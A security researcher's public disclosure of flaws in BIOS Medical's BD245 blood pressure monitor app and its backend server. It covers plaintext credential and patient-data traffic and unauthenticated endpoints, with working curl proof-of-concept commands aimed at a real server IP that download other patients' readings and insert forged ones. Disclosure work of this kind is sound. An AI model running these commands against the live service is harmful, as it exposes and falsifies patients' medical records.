Summary:

The mobile software, and backend servers created by BIOS Medical / Thermor Ltd used in their Bluetooth enabled Blood Pressure Monitor and Ear Thermometer suffer from serious design flaws which expose the private medical information of their customers

Products Affected:

  • Protocol 7D MII Blood Pressure Monitor Model BD245
  • Precision Temp Instant Ear Thermometer with Bluetooth

The following report is a copy of the letter, and detailed vulnerability / POC report which was hand delivered to Mark Beaton, VP Sales & Marketing - Thermor / BIOS Medical on November 17th 2017.

Since November 17th 2017, the flaws in the mobile software / server for the Precision Temp product have been addressed, however the vulnerabilities in the Blood Pressure Monitoring software / server still persist as of this posting.

Since Jan 18th 2018, I have made several attempts to contact Mark Beaton with regards to the remaining vulnerabilities with no response back from BIOS Medical / Thermor LLC.

Due to the lack of resolution/response from BIOS Medical on the issue, on March 27th 2018, an official complaint was filed with Health Canada on this matter. Confirmation of receipt by Health Canada was made. After 30 days, and no response back from Health Canada, a follow up contact was made. Since there still has been no response back from Health Canada and BIOS Medical, I have decided to publish this report publically.

Letter to BIOS Medical

Gary Reed:

I am writing you today to make you aware of a serious security issue with regards to one of your products that I recently purchased.  The product involved is the BIOS Medical BD245 Blood Pressure Monitor. As a result of several security flaws in your software for this device, I was able to:


1) View unencrypted traffic as it passed between my Android phone and your hosted servers, which contained private patient information such as:   
  i) email and password used to register and synchronize data.
  ii) private patient information such as name, phone #, medical professionals, and medications
2) Download other patients B.P. results
3) Insert false B.P. readings in other patients data.

My analysis was based on the Android Software, however due to the issues being mostly protocol related, I suspect the same issues are present with your iOS versions of the software as well. 

After the analysis of the BD245 Blood Pressure Monitor Software was complete, I took a quick look at some of your other related applications such as the Precision Temperature Software, and it would appear that you have other products / software which also contain similar security vulnerabilities. 

As I am not aware of your business model, and if these products are designed and built "in-house" or are sold as a white-label product, there is a concern that other companies that sell these devices / software are also subject to these security issues and must be made aware of their existence. Outlined in the rest of this document are the details with regards to the security flaws and the steps that can be taken to confirm their viability for exploitation.  

Based on the nature of the data exposed (both personal information, and medical related data) it is important that you address the security issues ASAP. 

Darryl Burke
Burke Consulting`

Copy of Vulnerability Report

Security Flaw Details:

Three separate issues have been found with the architecture / implementation of the BD245 / B.P. Toolkit software, which allows for the exposure of private patient data, as well as the unauthenticated download / insert of records to arbitrary patients on your back-end server.

Unencrypted Data

Network traffic between the BP Toolkit client running on Android, and the back-end server hosted in secureserver.net is not encrypted, and can be intercepted by 3rd parties who have access to the network (such and Enterprise admins etc.) The information which is exposed can be considered "sensitive" if the end user has decided to fill in their "profile" in the BP Toolkit software.

The following network traffic was intercepted in plain text between an Android client and the server:

Client Request

POST /kawinsemp/struts/regist/regist_login.do HTTP/1.1 Content-Length: 1018
Content-Type: multipart/form-data; boundary=oGGqltohMWs1TFKDDo-TATCw3KWXcNCwlhZfe
Host: 192.169.201.66:8680
Connection: Keep-Alive
--oGGqltohMWs1TFKDDo-TATCw3KWXcNCwlhZfe Content-Disposition: form-data; name="param"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
{"appid":"1mmu9ypy","appname":"kawin","birthday":"","confirmpass":"","deviceid":"187a9302c1de","email":"privatemail@gmail.com","issync":0,"isvalidate":"Y","lastlogintime":"2017-11-25 17:14:27","mobile":"","needvalidate":"N","newpass":"","pass":"XXXXXXXXXX","patient1contact":"bwisthetwo","patient1email":"privateemail@gmail.com","patient1listmedical":"pills","patient1medicalpro":"john","patient1name":"bwistheone","patient1phone1":"4165555555","patient1phone2":"","patient1targetdia":"101","patient1targetsys":"100","patient2contact":"","patient2email":"","patient2listmedical":"","patient2medicalpro":"","patient2name":"","patient2phone1":"","patient2phone2":"","patient2targetdia":"","patient2targetsys":"","platform":"android","regtime":"2017-11-14 14:31:14","ucode":"register20171114143114790","verifycode":""} --oGGqltohMWs1TFKDDo-TATCw3KWXcNCwlhZfe--

Server Response

HTTP/1.1 200 OK Server: Apache-Coyote/1.1
Transfer-Encoding: chunked
Date: Sun, 26 Nov 2017 02:30:34 GMT
{"msg":"register20171114143114790","obj":"1mmu9ypy","success":true}

Analysis

Based on the visible network traffic, there are several area's of concern which can be used to further exploit the system:

1. The data is sent in plain text to the server listening on port 8680, and does not use industry standard encryption such as SSL.

2. The Username and Password to the patients account are sent cleartext, and be intercepted and reused by others to gain full access to the patients account and data on the back end server.

3. A patient private information is exposed as part of every "login" attempt that happens every few seconds while the application is running.  This continuously  sends exposed data to/from the server and the client increasing the likely hood of being intercepted by an attacker. 

Unencrypted and Unauthenticated Download of Patent data

During the application configuration, the patient enters their email and password, and the software performs a basic authentication of the patients email and password, however, all further requests for data do not use any authentication, and use a sequential "key" which can be guessed to obtain data for other patients on the system.

Client Request

POST /kawinsemp/struts/normal/normal_downloadRecord.do HTTP/1.1 Content-Length: 284
Content-Type: multipart/form-data; boundary=14vE_WwZnuklZQ4XXa9FlCrQjZlFY1UVZHhe4U1
Host: 192.169.201.66:8680
Connection: Keep-Alive
--14vE_WwZnuklZQ4XXa9FlCrQjZlFY1UVZHhe4U1 Content-Disposition: form-data; name="param"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
{"fromrec":0,"torec":20,"ucode":"register20171114143114790","userno":""} --14vE_WwZnuklZQ4XXa9FlCrQjZlFY1UVZHhe4U1--

Server Response

HTTP/1.1 200 OK Server: Apache-Coyote/1.1
Transfer-Encoding: chunked
Date: Sun, 26 Nov 2017 00:56:05 GMT
{"msg":"","obj":[{"dia":100,"id":98260,"issync":1,"measuretime":"2017-11-14 14:33:00","pul":85,"recordid":"recordid20171114143328","sys":135,"ucode":"register20171114143114790","userindex":"0"},{"dia":100,"id":98261,"issync":1,"measuretime":"2017-11-14 14:36:00","pul":82,"recordid":"recordid20171114143624","sys":129,"ucode":"register20171114143114790","userindex":"0"},{"dia":91,"id":98982,"issync":1,"measuretime":"2017-11-14 14:43:00","pul":76,"recordid":"recordid20171116073426","sys":137,"ucode":"register20171114143114790","userindex":"1"},{"dia":102,"id":98983,"issync":1,"measuretime":"2017-11-16 07:30:00","pul":90,"recordid":"recordid20171116073425","sys":127,"ucode":"register20171114143114790","userindex":"0"},{"dia":101,"id":98984,"issync":1,"measuretime":"2017-11-16 07:32:00","pul":81,"recordid":"recordid20171116073425","sys":127,"ucode":"register20171114143114790","userindex":"0"}],"success":true}

Analysis

Based on the visible network traffic, there are several area's of concern which can be used to exploit the system:

1. The data is sent in plain text to the server listening on port 8680, and does not use industry standard encryption such as SSL. 

2. The request is not authenticated or tied to the previous account authentication, as such, guess a the "key" can provide access to other patient data on the system.

3. The requests use a simple date based format key to identify patients, which can be "guessed" by sequentially looping through  possible keys to identify other patients and download their data.

4. While the other patient data that can be downloaded does not contain any personal identifying information, there may be other server API endpoints which may be exploited using the "key" to gain that information. (Other API endpoints can be determined by easily reverse engineering the Android client) 

Proof of concept:

The following command can used used on any linux based machine to demonstrate the exposure of the patient B.P. data: (Note Usernames and Passwords are not required to obtain the data)

curl --header Accept: --header User-Agent: --header Expect: --header "Connection: Keep-Alive" --form 'param={"fromrec":0,"torec":40,"ucode":"register20171114143114790","userno":""}' http://192.169.201.66:8680/kawinsemp/struts/normal/normal_downloadRecord.do

Unencrypted and Unauthenticated Insert of Patent data

During the application use, the patient synchronizes their phone with the B.P. monitor, the data is sent in an unencrypted and unauthenticated format to the server, which can be intercepted and used to "forge" false readings in other patients accounts.

Client Request:

POST /kawinsemp/struts/normal/normal_syncRecords.do HTTP/1.1 Content-Length: 382
Content-Type: multipart/form-data; boundary=VOYMA6DAZ9pyuG7qP3N4WGyNMzEXJQ5IuEjfbp
Host: 192.169.201.66:8680
Connection: Keep-Alive
--VOYMA6DAZ9pyuG7qP3N4WGyNMzEXJQ5IuEjfbp Content-Disposition: form-data; name="param"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
{"dia":88,"id":44,"issync":1,"measuretime":"2017-11-25 21:26:00","pul":99,"recordid":"recordid20171125212945","sys":128,"ucode":"register20171114143114790","userindex":"0"} --VOYMA6DAZ9pyuG7qP3N4WGyNMzEXJQ5IuEjfbp--

Server Response

HTTP/1.1 200 OK Server: Apache-Coyote/1.1
Transfer-Encoding: chunked
Date: Sun, 26 Nov 2017 02:30:00 GMT
{"msg":"","success":true}

Analysis

Based on the visible network traffic, there are several area's of concern which can be used to exploit the system:

1. The data is sent in plain text to the server listening on port 8680, and does not use industry standard encryption such as SSL. 

2. The request is not authenticated or tied to the previous account authentication, keys to other patients accounts can be guessed.

3. The requests use a simple date based format key to identify patients, which can be "guessed" by sequentially looping through  possible keys to identify other patients and insert false data.

Proof of concept:

The following command can used used on any linux based machine to demonstrate the ability to insert false B.P. data: (Note Usernames and Passwords are not required to insert the data)

Insert False Data:

curl --header Accept: --header User-Agent: --header Expect: --header "Connection: Keep-Alive" --form 'param={"dia":77,"id":47,"issync":1,"measuretime":"2017-11-25 22:23:22","pul":99,"recordid":"recordid20171125222322","sys":99,"ucode":"register20171114143114790","userindex":"0"}' http://192.169.201.66:8680/kawinsemp/struts/normal/normal_syncRecords.do

Verify Server Acceptance of False Data:

curl --header Accept: --header User-Agent: --header Expect: --header "Connection: Keep-Alive" --form 'param={"fromrec":0,"torec":60,"ucode":"register20171114143114790","userno":""}' http://192.169.201.66:8680/kawinsemp/struts/normal/normal_downloadRecord.do

Additional data in patient data inserted and confirmed:

{ "dia": 77, "id": 103012, "issync": 1, "measuretime": "2017-11-25 22:23:22", "pul": 99, "recordid": "recordid20171125222322", "sys": 99, "ucode": "register20171114143114790", "userindex": "0" }

Darryl Burke

Darryl Burke

Over 25 years of Information Technology, Security, Hardware and Software architecture leadership, focusing on complex systems integration and mission critical applications.

The great white north http://www.burke-consulting.net